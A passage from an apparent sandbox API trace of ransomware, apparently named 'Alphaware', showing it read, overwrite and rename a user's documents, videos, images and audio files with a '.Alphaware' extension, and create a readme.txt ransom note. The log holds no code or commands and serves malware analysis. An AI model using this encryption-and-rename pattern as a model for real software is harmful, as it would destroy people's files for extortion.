(lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\UKlsVP0OeoLUyu0aA\\-Cj6mvIu4.odt", dwFileAttributes=0x80) returned 1 [0080.984] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e958) returned 1 [0080.984] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\UKlsVP0OeoLUyu0aA\\-Cj6mvIu4.odt" (normalized: "c:\\users\\keecfmwgj\\desktop\\uklsvp0oeoluyu0aa\\-cj6mviu4.odt"), fInfoLevelId=0x0, lpFileInformation=0x25a29b0 | out: lpFileInformation=0x25a29b0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x7ceff40, ftCreationTime.dwHighDateTime=0x1d97157, ftLastAccessTime.dwLowDateTime=0xd09f55f0, ftLastAccessTime.dwHighDateTime=0x1d97427, ftLastWriteTime.dwLowDateTime=0xd09f55f0, ftLastWriteTime.dwHighDateTime=0x1d97427, nFileSizeHigh=0x0, nFileSizeLow=0x1116b)) returned 1 [0080.984] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e908) returned 1 [0080.984] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9e8) returned 1 [0080.984] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\UKlsVP0OeoLUyu0aA\\-Cj6mvIu4.odt" (normalized: "c:\\users\\keecfmwgj\\desktop\\uklsvp0oeoluyu0aa\\-cj6mviu4.odt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0080.985] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e958) returned 1 [0080.985] ReadFile (in: hFile=0x254, lpBuffer=0x25a2c28, nNumberOfBytesToRead=0x1116b, lpNumberOfBytesRead=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x25a2c28*, lpNumberOfBytesRead=0x23ea98*=0x1116b, lpOverlapped=0x0) returned 1 [0081.007] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e918) returned 1 [0081.007] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\UKlsVP0OeoLUyu0aA\\-Cj6mvIu4.odt" (normalized: "c:\\users\\keecfmwgj\\desktop\\uklsvp0oeoluyu0aa\\-cj6mviu4.odt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0081.009] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e888) returned 1 [0081.012] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e888) returned 1 [0081.012] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\UKlsVP0OeoLUyu0aA\\-Cj6mvIu4.odt" (normalized: "c:\\users\\keecfmwgj\\desktop\\uklsvp0oeoluyu0aa\\-cj6mviu4.odt"), fInfoLevelId=0x0, lpFileInformation=0x23ebb0 | out: lpFileInformation=0x23ebb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ceff40, ftCreationTime.dwHighDateTime=0x1d97157, ftLastAccessTime.dwLowDateTime=0xd09f55f0, ftLastAccessTime.dwHighDateTime=0x1d97427, ftLastWriteTime.dwLowDateTime=0x827b2440, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x16d60)) returned 1 [0081.012] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e838) returned 1 [0081.012] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\UKlsVP0OeoLUyu0aA\\-Cj6mvIu4.odt" (normalized: "c:\\users\\keecfmwgj\\desktop\\uklsvp0oeoluyu0aa\\-cj6mviu4.odt"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\UKlsVP0OeoLUyu0aA\\-Cj6mvIu4.odt.Alphaware" (normalized: "c:\\users\\keecfmwgj\\desktop\\uklsvp0oeoluyu0aa\\-cj6mviu4.odt.alphaware")) returned 1 [0081.013] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9a8) returned 1 [0081.013] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\UKlsVP0OeoLUyu0aA\\readme.txt" (normalized: "c:\\users\\keecfmwgj\\desktop\\uklsvp0oeoluyu0aa\\readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0081.015] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e918) returned 1 [0081.016] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\UKlsVP0OeoLUyu0aA\\1BM5 _1HkTZyXvgJAFgc.flv", dwFileAttributes=0x80) returned 1 [0081.016] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e958) returned 1 [0081.016] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\UKlsVP0OeoLUyu0aA\\1BM5 _1HkTZyXvgJAFgc.flv" (normalized: "c:\\users\\keecfmwgj\\desktop\\uklsvp0oeoluyu0aa\\1bm5 _1hktzyxvgjafgc.flv"), fInfoLevelId=0x0, lpFileInformation=0x2668700 | out: lpFileInformation=0x2668700*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfa54100, ftCreationTime.dwHighDateTime=0x1d969ac, ftLastAccessTime.dwLowDateTime=0xf4a8ece0, ftLastAccessTime.dwHighDateTime=0x1d96b99, ftLastWriteTime.dwLowDateTime=0xf4a8ece0, ftLastWriteTime.dwHighDateTime=0x1d96b99, nFileSizeHigh=0x0, nFileSizeLow=0xf626)) returned 1 [0081.016] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e908) returned 1 [0081.017] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9e8) returned 1 [0081.017] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\UKlsVP0OeoLUyu0aA\\1BM5 _1HkTZyXvgJAFgc.flv" (normalized: "c:\\users\\keecfmwgj\\desktop\\uklsvp0oeoluyu0aa\\1bm5 _1hktzyxvgjafgc.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0081.017] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e958) returned 1 [0081.017] ReadFile (in: hFile=0x254, lpBuffer=0x26689d8, nNumberOfBytesToRead=0xf626, lpNumberOfBytesRead=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x26689d8*, lpNumberOfBytesRead=0x23ea98*=0xf626, lpOverlapped=0x0) returned 1 [0081.046] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e918) returned 1 [0081.046] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\UKlsVP0OeoLUyu0aA\\1BM5 _1HkTZyXvgJAFgc.flv" (normalized: "c:\\users\\keecfmwgj\\desktop\\uklsvp0oeoluyu0aa\\1bm5 _1hktzyxvgjafgc.flv"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0081.048] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e888) returned 1 [0081.051] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e888) returned 1 [0081.051] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\UKlsVP0OeoLUyu0aA\\1BM5 _1HkTZyXvgJAFgc.flv" (normalized: "c:\\users\\keecfmwgj\\desktop\\uklsvp0oeoluyu0aa\\1bm5 _1hktzyxvgjafgc.flv"), fInfoLevelId=0x0, lpFileInformation=0x23ebb0 | out: lpFileInformation=0x23ebb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa54100, ftCreationTime.dwHighDateTime=0x1d969ac, ftLastAccessTime.dwLowDateTime=0xf4a8ece0, ftLastAccessTime.dwHighDateTime=0x1d96b99, ftLastWriteTime.dwLowDateTime=0x82824860, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x14908)) returned 1 [0081.051] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e838) returned 1 [0081.051] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\UKlsVP0OeoLUyu0aA\\1BM5 _1HkTZyXvgJAFgc.flv" (normalized: "c:\\users\\keecfmwgj\\desktop\\uklsvp0oeoluyu0aa\\1bm5 _1hktzyxvgjafgc.flv"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\UKlsVP0OeoLUyu0aA\\1BM5 _1HkTZyXvgJAFgc.flv.Alphaware" (normalized: "c:\\users\\keecfmwgj\\desktop\\uklsvp0oeoluyu0aa\\1bm5 _1hktzyxvgjafgc.flv.alphaware")) returned 1 [0081.052] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\UKlsVP0OeoLUyu0aA\\Fj0H-XEEG0GP.flv", dwFileAttributes=0x80) returned 1 [0081.052] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e958) returned 1 [0081.052] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\UKlsVP0OeoLUyu0aA\\Fj0H-XEEG0GP.flv" (normalized: "c:\\users\\keecfmwgj\\desktop\\uklsvp0oeoluyu0aa\\fj0h-xeeg0gp.flv"), fInfoLevelId=0x0, lpFileInformation=0x2530af8 | out: lpFileInformation=0x2530af8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xea5d9440, ftCreationTime.dwHighDateTime=0x1d97056, ftLastAccessTime.dwLowDateTime=0xad82b670, ftLastAccessTime.dwHighDateTime=0x1d97346, ftLastWriteTime.dwLowDateTime=0xad82b670, ftLastWriteTime.dwHighDateTime=0x1d97346, nFileSizeHigh=0x0, nFileSizeLow=0x1dec)) returned 1 [0081.052] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e908) returned 1 [0081.052] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9e8) returned 1 [0081.053] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\UKlsVP0OeoLUyu0aA\\Fj0H-XEEG0GP.flv" (normalized: "c:\\users\\keecfmwgj\\desktop\\uklsvp0oeoluyu0aa\\fj0h-xeeg0gp.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0081.053] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e958) returned 1 [0081.053] ReadFile (in: hFile=0x254, lpBuffer=0x2530d90, nNumberOfBytesToRead=0x1dec, lpNumberOfBytesRead=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x2530d90*, lpNumberOfBytesRead=0x23ea98*=0x1dec, lpOverlapped=0x0) returned 1 [0081.074] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e918) returned 1 [0081.074] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\UKlsVP0OeoLUyu0aA\\Fj0H-XEEG0GP.flv" (normalized: "c:\\users\\keecfmwgj\\desktop\\uklsvp0oeoluyu0aa\\fj0h-xeeg0gp.flv"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0081.075] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e888) returned 1 [0081.077] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e888) returned 1 [0081.077] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\UKlsVP0OeoLUyu0aA\\Fj0H-XEEG0GP.flv" (normalized: "c:\\users\\keecfmwgj\\desktop\\uklsvp0oeoluyu0aa\\fj0h-xeeg0gp.flv"), fInfoLevelId=0x0, lpFileInformation=0x23ebb0 | out: lpFileInformation=0x23ebb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea5d9440, ftCreationTime.dwHighDateTime=0x1d97056, ftLastAccessTime.dwLowDateTime=0xad82b670, ftLastAccessTime.dwHighDateTime=0x1d97346, ftLastWriteTime.dwLowDateTime=0x82870b20, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x28b4)) returned 1 [0081.077] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e838) returned 1 [0081.077] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\UKlsVP0OeoLUyu0aA\\Fj0H-XEEG0GP.flv" (normalized: "c:\\users\\keecfmwgj\\desktop\\uklsvp0oeoluyu0aa\\fj0h-xeeg0gp.flv"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\UKlsVP0OeoLUyu0aA\\Fj0H-XEEG0GP.flv.Alphaware" (normalized: "c:\\users\\keecfmwgj\\desktop\\uklsvp0oeoluyu0aa\\fj0h-xeeg0gp.flv.alphaware")) returned 1 [0081.078] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\UKlsVP0OeoLUyu0aA\\grD5c_7rsX_r-Az.doc", dwFileAttributes=0x80) returned 1 [0081.078] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e958) returned 1 [0081.078] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\UKlsVP0OeoLUyu0aA\\grD5c_7rsX_r-Az.doc" (normalized: "c:\\users\\keecfmwgj\\desktop\\uklsvp0oeoluyu0aa\\grd5c_7rsx_r-az.doc"), fInfoLevelId=0x0, lpFileInformation=0x25c3e68 | out: lpFileInformation=0x25c3e68*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xec0ecb90, ftCreationTime.dwHighDateTime=0x1d96f36, ftLastAccessTime.dwLowDateTime=0xd356be60, ftLastAccessTime.dwHighDateTime=0x1d97322, ftLastWriteTime.dwLowDateTime=0xd356be60, ftLastWriteTime.dwHighDateTime=0x1d97322, nFileSizeHigh=0x0, nFileSizeLow=0x10bdc)) returned 1 [0081.078] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e908) returned 1 [0081.078] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9e8) returned 1 [0081.078] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\UKlsVP0OeoLUyu0aA\\grD5c_7rsX_r-Az.doc" (normalized: "c:\\users\\keecfmwgj\\desktop\\uklsvp0oeoluyu0aa\\grd5c_7rsx_r-az.doc"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0081.079] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e958) returned 1 [0081.079] ReadFile (in: hFile=0x254, lpBuffer=0x25c4110, nNumberOfBytesToRead=0x10bdc, lpNumberOfBytesRead=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x25c4110*, lpNumberOfBytesRead=0x23ea98*=0x10bdc, lpOverlapped=0x0) returned 1 [0081.102] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e918) returned 1 [0081.102] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\UKlsVP0OeoLUyu0aA\\grD5c_7rsX_r-Az.doc" (normalized: "c:\\users\\keecfmwgj\\desktop\\uklsvp0oeoluyu0aa\\grd5c_7rsx_r-az.doc"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0081.104] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e888) returned 1 [0081.107] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e888) returned 1 [0081.107] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\UKlsVP0OeoLUyu0aA\\grD5c_7rsX_r-Az.doc" (normalized: "c:\\users\\keecfmwgj\\desktop\\uklsvp0oeoluyu0aa\\grd5c_7rsx_r-az.doc"), fInfoLevelId=0x0, lpFileInformation=0x23ebb0 | out: lpFileInformation=0x23ebb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec0ecb90, ftCreationTime.dwHighDateTime=0x1d96f36, ftLastAccessTime.dwLowDateTime=0xd356be60, ftLastAccessTime.dwHighDateTime=0x1d97322, ftLastWriteTime.dwLowDateTime=0x828bcde0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x165f4)) returned 1 [0081.108] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e838) returned 1 [0081.108] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\UKlsVP0OeoLUyu0aA\\grD5c_7rsX_r-Az.doc" (normalized: "c:\\users\\keecfmwgj\\desktop\\uklsvp0oeoluyu0aa\\grd5c_7rsx_r-az.doc"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\UKlsVP0OeoLUyu0aA\\grD5c_7rsX_r-Az.doc.Alphaware" (normalized: "c:\\users\\keecfmwgj\\desktop\\uklsvp0oeoluyu0aa\\grd5c_7rsx_r-az.doc.alphaware")) returned 1 [0081.109] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\UKlsVP0OeoLUyu0aA\\IoUNPPwfOO3o6JZNAZ0x.png", dwFileAttributes=0x80) returned 1 [0081.109] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e958) returned 1 [0081.109] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\UKlsVP0OeoLUyu0aA\\IoUNPPwfOO3o6JZNAZ0x.png" (normalized: "c:\\users\\keecfmwgj\\desktop\\uklsvp0oeoluyu0aa\\iounppwfoo3o6jznaz0x.png"), fInfoLevelId=0x0, lpFileInformation=0x2684728 | out: lpFileInformation=0x2684728*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x572ee5c0, ftCreationTime.dwHighDateTime=0x1d96cd7, ftLastAccessTime.dwLowDateTime=0x5fa6c0a0, ftLastAccessTime.dwHighDateTime=0x1d9720f, ftLastWriteTime.dwLowDateTime=0x5fa6c0a0, ftLastWriteTime.dwHighDateTime=0x1d9720f, nFileSizeHigh=0x0, nFileSizeLow=0x1755a)) returned 1 [0081.109] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e908) returned 1 [0081.109] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9e8) returned 1 [0081.109] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\UKlsVP0OeoLUyu0aA\\IoUNPPwfOO3o6JZNAZ0x.png" (normalized: "c:\\users\\keecfmwgj\\desktop\\uklsvp0oeoluyu0aa\\iounppwfoo3o6jznaz0x.png"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0081.109] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e958) returned 1 [0081.109] ReadFile (in: hFile=0x254, lpBuffer=0x1317cef8, nNumberOfBytesToRead=0x1755a, lpNumberOfBytesRead=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x1317cef8*, lpNumberOfBytesRead=0x23ea98*=0x1755a, lpOverlapped=0x0) returned 1 [0081.137] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e918) returned 1 [0081.137] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\UKlsVP0OeoLUyu0aA\\IoUNPPwfOO3o6JZNAZ0x.png" (normalized: "c:\\users\\keecfmwgj\\desktop\\uklsvp0oeoluyu0aa\\iounppwfoo3o6jznaz0x.png"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0081.139] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e888) returned 1 [0081.143] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e888) returned 1 [0081.143] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\UKlsVP0OeoLUyu0aA\\IoUNPPwfOO3o6JZNAZ0x.png" (normalized: "c:\\users\\keecfmwgj\\desktop\\uklsvp0oeoluyu0aa\\iounppwfoo3o6jznaz0x.png"), fInfoLevelId=0x0, lpFileInformation=0x23ebb0 | out: lpFileInformation=0x23ebb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x572ee5c0, ftCreationTime.dwHighDateTime=0x1d96cd7, ftLastAccessTime.dwLowDateTime=0x5fa6c0a0, ftLastAccessTime.dwHighDateTime=0x1d9720f, ftLastWriteTime.dwLowDateTime=0x829090a0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1f2a0)) returned 1 [0081.143] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e838) returned 1 [0081.143] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\UKlsVP0OeoLUyu0aA\\IoUNPPwfOO3o6JZNAZ0x.png" (normalized: "c:\\users\\keecfmwgj\\desktop\\uklsvp0oeoluyu0aa\\iounppwfoo3o6jznaz0x.png"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\UKlsVP0OeoLUyu0aA\\IoUNPPwfOO3o6JZNAZ0x.png.Alphaware" (normalized: "c:\\users\\keecfmwgj\\desktop\\uklsvp0oeoluyu0aa\\iounppwfoo3o6jznaz0x.png.alphaware")) returned 1 [0081.144] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\UKlsVP0OeoLUyu0aA\\Jc7CE.wav", dwFileAttributes=0x80) returned 1 [0081.144] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e958) returned 1 [0081.144] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\UKlsVP0OeoLUyu0aA\\Jc7CE.wav" (normalized: "c:\\users\\keecfmwgj\\desktop\\uklsvp0oeoluyu0aa\\jc7ce.wav"), fInfoLevelId=0x0, lpFileInformation=0x24f36d0 | out: lpFileInformation=0x24f36d0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xc0c78100, ftCreationTime.dwHighDateTime=0x1d96bf5, ftLastAccessTime.dwLowDateTime=0x31ce380, ftLastAccessTime.dwHighDateTime=0x1d97144, ftLastWriteTime.dwLowDateTime=0x31ce380, ftLastWriteTime.dwHighDateTime=0x1d97144, nFileSizeHigh=0x0, nFileSizeLow=0xe6a5)) returned 1 [0081.144] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e908) returned 1 [0081.144] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9e8) returned 1 [0081.144] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\UKlsVP0OeoLUyu0aA\\Jc7CE.wav" (normalized: "c:\\users\\keecfmwgj\\desktop\\uklsvp0oeoluyu0aa\\jc7ce.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0081.145] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e958) returned 1 [0081.145] ReadFile (in: hFile=0x254, lpBuffer=0x24f3928, nNumberOfBytesToRead=0xe6a5, lpNumberOfBytesRead=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x24f3928*, lpNumberOfBytesRead=0x23ea98*=0xe6a5, lpOverlapped=0x0) returned 1 [0081.169] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e918) returned 1 [0081.169] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\UKlsVP0OeoLUyu0aA\\Jc7CE.wav" (normalized: "c:\\users\\keecfmwgj\\desktop\\uklsvp0oeoluyu0aa\\jc7ce.wav"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0081.170] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e888) returned 1 [0081.173] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e888) returned 1 [0081.173] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\UKlsVP0OeoLUyu0aA\\Jc7CE.wav" (normalized: "c:\\users\\keecfmwgj\\desktop\\uklsvp0oeoluyu0aa\\jc7ce.wav"), fInfoLevelId=0x0, lpFileInformation=0x23ebb0 | out: lpFileInformation=0x23ebb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0c78100, ftCreationTime.dwHighDateTime=0x1d96bf5, ftLastAccessTime.dwLowDateTime=0x31ce380, ftLastAccessTime.dwHighDateTime=0x1d97144, ftLastWriteTime.dwLowDateTime=0x82955360, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x13460)) returned 1 [0081.173] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e838) returned 1 [0081.174] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\UKlsVP0OeoLUyu0aA\\Jc7CE.wav" (normalized: "c:\\users\\keecfmwgj\\desktop\\uklsvp0oeoluyu0aa\\jc7ce.wav"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\UKlsVP0OeoLUyu0aA\\Jc7CE.wav.Alphaware" (normalized: "c:\\users\\keecfmwgj\\desktop\\uklsvp0oeoluyu0aa\\jc7ce.wav.alphaware")) returned 1 [0081.174] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\UKlsVP0OeoLUyu0aA\\Kmo_0PpyMcbzk.m4a", dwFileAttributes=0x80) returned 1 [0081.175] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e958) returned 1 [0081.175] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\UKlsVP0OeoLUyu0aA\\Kmo_0PpyMcbzk.m4a" (normalized: "c:\\users\\keecfmwgj\\desktop\\uklsvp0oeoluyu0aa\\kmo_0ppymcbzk.m4a"), fInfoLevelId=0x0, lpFileInformation=0x25abaf0 | out: lpFileInformation=0x25abaf0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xadb0ef00, ftCreationTime.dwHighDateTime=0x1d96bca, ftLastAccessTime.dwLowDateTime=0xed24a8e0, ftLastAccessTime.dwHighDateTime=0x1d96df8, ftLastWriteTime.dwLowDateTime=0xed24a8e0, ftLastWriteTime.dwHighDateTime=0x1d96df8, nFileSizeHigh=0x0, nFileSizeLow=0x8492)) returned 1 [0081.175] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e908) returned 1 [0081.175] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9e8) returned 1 [0081.175] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\UKlsVP0OeoLUyu0aA\\Kmo_0PpyMcbzk.m4a" (normalized: "c:\\users\\keecfmwgj\\desktop\\uklsvp0oeoluyu0aa\\kmo_0ppymcbzk.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0081.175] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e958) returned 1 [0081.175] ReadFile (in: hFile=0x254, lpBuffer=0x25abd88, nNumberOfBytesToRead=0x8492, lpNumberOfBytesRead=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x25abd88*, lpNumberOfBytesRead=0x23ea98*=0x8492, lpOverlapped=0x0) returned 1 [0081.245] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e918) returned 1 [0081.245] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\UKlsVP0OeoLUyu0aA\\Kmo_0PpyMcbzk.m4a" (normalized: "c:\\users\\keecfmwgj\\desktop\\uklsvp0oeoluyu0aa\\kmo_0ppymcbzk.m4a"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0081.246] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e888) returned 1 [0081.247] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e888) returned 1 [0081.247] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\UKlsVP0OeoLUyu0aA\\Kmo_0PpyMcbzk.m4a" (normalized: "c:\\users\\keecfmwgj\\desktop\\uklsvp0oeoluyu0aa\\kmo_0ppymcbzk.m4a"), fInfoLevelId=0x0, lpFileInformation=0x23ebb0 | out: 